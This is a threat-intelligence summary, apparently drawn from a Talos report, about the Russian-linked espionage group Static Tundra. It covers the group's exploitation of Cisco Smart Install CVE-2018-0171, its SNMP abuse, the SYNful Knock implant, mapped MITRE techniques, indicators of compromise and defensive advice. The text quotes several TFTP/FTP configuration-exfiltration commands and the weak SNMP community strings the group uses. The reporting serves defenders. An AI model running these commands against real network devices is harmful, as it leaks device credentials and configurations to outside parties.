Static Tundra is a Russian state-sponsored espionage group linked to the FSB’s Center 16 that has for over a decade exploited Cisco Smart Install (CVE-2018-0171) and unpatched/end-of-life devices to steal configurations and maintain long-term access using implants like SYNful Knock and bespoke SNMP tooling. The group primarily targets telecommunications, higher education and manufacturing organizations across multiple regions, and defenders are urged to patch, disable Smart Install, and harden device configurations to detect and prevent ongoing exploitation. #CVE-2018-0171 #SYNfulKnock
Keypoints
- Static Tundra is assessed as a Russian state-sponsored cluster linked to FSB Center 16 and possibly related to Energetic Bear/BERSERK BEAR.
- The group has exploited the seven-year-old Cisco Smart Install vulnerability CVE-2018-0171 since at least 2015 to extract device configuration and enable persistence.
- Primary targets include telecom, higher education, and manufacturing organizations across North America, Asia, Africa and Europe, with intensified activity against Ukrainian and allied entities since the Russia-Ukraine war began.
- Persistence techniques include the SYNful Knock IOS firmware implant, creation of local privileged accounts, compromised SNMP community strings, and GRE tunnels/NetFlow collection for traffic capture.
- Initial access is automated via bespoke tooling leveraging public scan data (e.g., Shodan/Censys) and can include exploitation of CVE-2018-0171 or misuse of SNMP with weak community strings like “public” or “anonymous”.
- Exfiltration methods include TFTP/FTP pulls and SNMP/CISCO-CONFIG-COPY-MIB usage to retrieve startup or running configurations revealing credentials and SNMP strings.
- Recommended defenses: apply CVE-2018-0171 patch or disable Smart Install, follow Cisco hardening guidance, enforce strong credentials, use SNMPv3/MFA/AAA, monitor logs/NetFlow, and replace end-of-life devices.
MITRE Techniques
- [T1210] Exploitation of Remote Services – Exploited CVE-2018-0171 in Cisco Smart Install to execute code or trigger reloads and then retrieve configuration via TFTP (“tftp-server nvram:startup-config”).
- [T1574.001] Hijack Execution Flow: Firmware – Installed the SYNful Knock Cisco IOS firmware implant to persist across reboots and accept specially crafted TCP SYN “magic packets”.
- [T1046] Network Service Discovery – Used native device commands such as “show cdp neighbors” to discover additional systems within target environments.
- [T1095] Non-Application Layer Protocol – Established GRE tunnels to redirect and capture traffic of interest to attacker-controlled infrastructure for collection.
- [T1041] Exfiltration Over C2 Channel – Exfiltrated configuration files using TFTP/FTP commands (e.g., “do show running-config | redirect tftp://:/conf_bckp”, “copy running-config ftp://user:pass@/output.txt”).
- [T1110] Brute Force – Leveraged weak or guessed SNMP community strings (e.g., “public”, “anonymous”) to gain access when credentials were not previously compromised.
- [T1078] Valid Accounts – Created privileged local user accounts and additional SNMP read-write community strings to maintain long-term access.
- [T1499] Endpoint Denial of Service (modification) – Modified running configuration and TACACS+/ACLs to hinder logging and evade detection (“modifying TACACS+ configuration” and “modifies access control lists”).
- [T1020] Automated Collection – Used bespoke tooling to automate exploitation, configuration extraction, and scanning of predefined target IP sets likely sourced from public scan data like Shodan or Censys.
Indicators of Compromise
- [IP Address] Observed attacker infrastructure and activity timestamps – 185.141.24[.]222 (2023/03/23), 185.82.202[.]34 (2025/01/15 – 2025/02/28).
- [IP Address] Additional observed infrastructure – 185.141.24[.]28 (2024/10/01 – 2025/07/03), 185.82.200[.]181 (2024/10/01 – 2024/11/15).
- [File/Command] Configuration exfiltration commands seen – “do show running-config | redirect tftp://:/conf_bckp”, “copy running-config ftp://user:pass@/output.txt”.
- [Service/Artifact] Persistent implant and tooling – SYNful Knock firmware implant (Cisco IOS) and use of CISCO-CONFIG-COPY-MIB for exfiltration (and bespoke SNMP tooling).
Read more: https://blog.talosintelligence.com/static-tundra/